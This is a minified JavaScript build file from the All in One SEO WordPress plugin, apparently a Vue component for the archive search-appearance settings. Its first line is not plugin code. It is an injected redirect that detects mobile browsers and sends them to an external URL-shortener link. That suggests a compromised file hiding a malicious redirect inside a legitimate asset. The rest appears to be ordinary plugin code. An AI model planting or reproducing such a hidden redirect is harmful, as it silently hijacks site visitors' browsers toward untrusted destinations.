(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{q as A,b as v,y as S}from"./app-core.c8323d51.js";import{u as y}from"./PostTypes.9ab2ae40.js";import{T as C,A as T}from"./TitleDescription.84ef03e4.js";import{C as D}from"./Card.9ee06a3e.js";import{C as x}from"./Tabs.ea329423.js";import{aq as i,f as s,i as c,O as k,ad as P,Q as p,R as a,a0 as l,a4 as B,S as O,j as m,P as w,U as j}from"./vendor-vue-ui.232c7c36.js";import{_ as L}from"./_plugin-vue_export-helper.eefbdd86.js";import{_ as u}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./JsonValues.a0694556.js";import"./RadioToggle.11796642.js";import"./RobotsMeta.427ab190.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Row.2ef96b1a.js";import"./SettingsRow.7bec777f.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./GoogleSearchPreview.bde29b0b.js";import"./Caret.aae02d8a.js";import"./Url.535116f6.js";import"./HtmlTagsEditor.381fbf72.js";import"./Editor.7ff35261.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Pencil.683baab8.js";import"./Trash.47f6fc0e.js";import"./UnfilteredHtml.9575a9a9.js";import"./vendor-emoji.92c96208.js";import"./Tooltip.569a23d9.js";import"./Slide.f2114d9d.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Information.6ccba108.js";const d="all-in-one-seo-pack",R={setup(){const{getPostIconClass:e}=y();return{getPostIconClass:e,optionsStore:S(),rootStore:v(),settingsStore:A()}},components:{Advanced:T,CoreCard:D,CoreMainTabs:x,TitleDescription:C},data(){return{internalDebounce:null,tabs:[{slug:"title-description",name:u("Title & Description",d),access:"aioseo_search_appearance_settings",pro:!1},{slug:"advanced",name:u("Advanced",d),access:"aioseo_search_appearance_settings",pro:!1}],archives:[{label:"Author Archives",name:"author",singular:"Author",icon:"dashicons-admin-users"},{label:"Date Archives",name:"date",singular:"Date",icon:"dashicons-calendar-alt"},{label:"Search Page",name:"search",singular:"Search Page",icon:"dashicons-search"}]}},computed:{getArchives(){return this.archives.concat(this.rootStore.aioseo.postData.archives.map(e=>({label:`${e.label} Archives`,name:`${e.name}Archive`,icon:e?.icon||"dashicons-category",singular:e.singular,dynamic:!0})))}},methods:{processChangeTab(e,n){this.internalDebounce||(this.internalDebounce=!0,this.settingsStore.changeTab({slug:`${e}Archives`,value:n}),setTimeout(()=>{this.internalDebounce=!1},50))},getOptions(e){return e.dynamic?this.optionsStore.dynamicOptions.searchAppearance.archives[e.name.replace("Archive","")]:this.optionsStore.options.searchAppearance.archives[e.name]}}},$={class:"aioseo-search-appearance-archives"};function q(e,n,I,o,h,r){const _=i("core-main-tabs"),g=i("core-card");return s(),c("div",$,[(s(!0),c(k,null,P(r.getArchives,(t,f)=>(s(),p(g,{key:f,slug:`${t.name}Archives`,"card-id":`${t.name}Archives`},{header:a(()=>[m("div",{class:w(["icon dashicons",o.getPostIconClass(t.icon)])},null,2),m("div",null,j(t.label),1)]),tabs:a(()=>[l(_,{tabs:h.tabs,showSaveButton:!1,active:o.settingsStore.settings.internalTabs[`${t.name}Archives`],internal:"",onChanged:b=>r.processChangeTab(t.name,b)},null,8,["tabs","active","onChanged"])]),default:a(()=>[l(B,{name:"route-fade",mode:"out-in"},{default:a(()=>[(s(),p(O(o.settingsStore.settings.internalTabs[`${t.name}Archives`]),{object:t,separator:o.optionsStore.options.searchAppearance.global.separator,options:r.getOptions(t),type:"archives","show-bulk":!1,"no-meta-box":"","include-keywords":""},null,8,["object","separator","options"]))]),_:2},1024)]),_:2},1032,["slug","card-id"]))),128))])}const be=L(R,[["render",q]]);export{be as default};
